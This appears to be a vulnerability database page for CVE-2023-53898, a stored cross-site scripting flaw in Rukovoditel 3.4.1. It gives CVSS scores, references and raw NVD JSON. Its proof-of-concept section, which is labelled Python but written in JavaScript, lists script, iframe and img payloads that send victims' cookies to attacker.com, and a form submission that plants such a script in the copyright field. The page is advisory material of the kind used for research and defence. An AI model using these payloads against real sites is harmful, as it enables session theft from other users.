CVE-2023-53898

Description

Rukovoditel 3.4.1 contains a stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert iframe and script payloads in application copyright text to execute arbitrary JavaScript in victim browsers.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rukovoditel:rukovoditel:3.4.1:*:*:*:*:*:*:* - VULNERABLE

Rukovoditel 3.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2023-53898 PoC - Stored XSS in Rukovoditel Copyright Field
// Target: Rukovoditel 3.4.1
// Attack Vector: Inject malicious script in application copyright text

// Step 1: Authenticate with low-privilege account
const loginEndpoint = 'http://target.com/index.php?module=users/login';
const credentials = { 
    username: 'attacker_user', 
    password: 'password123' 
};

// Step 2: Navigate to configuration settings
const configUrl = 'http://target.com/index.php?module=configuration';

// Step 3: Inject XSS payload in copyright field
const xssPayloads = [
    '<script>alert(document.domain)</script>',
    '<iframe src="javascript:alert(document.cookie)">',
    '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">'
];

// Example POST request to update copyright
const updateRequest = {
    url: 'http://target.com/index.php?module=configuration/save',
    method: 'POST',
    formData: {
        copyright: '<script>document.write(\'<img src=https://attacker.com/log?c=\'+document.cookie+\'>\')</script>',
        save: '1'
    }
};

// Step 4: Payload will execute for all users viewing affected pages
// Victims' cookies will be sent to attacker-controlled server
console.log('XSS Payload injected successfully');
console.log('All users visiting the application will execute the malicious script');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53898
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53898
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53898/
[4] VulDB https://vuldb.com/cve/CVE-2023-53898
[5] https://www.exploit-db.com/exploits/51548
[6] https://www.rukovoditel.net/
[7] https://www.vulncheck.com/advisories/rukovoditel-multiple-stored-cross-site-scripting-via-configuration

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53898", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:02.060", "lastModified": "2025-12-27T17:15:42.250", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rukovoditel 3.4.1 contains a stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert iframe and script payloads in application copyright text to execute arbitrary JavaScript in victim browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "AE728A4C-C775-42DE-873D-605F77758927"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51548", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.rukovoditel.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/rukovoditel-multiple-stored-cross-site-scripting-via-configuration", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}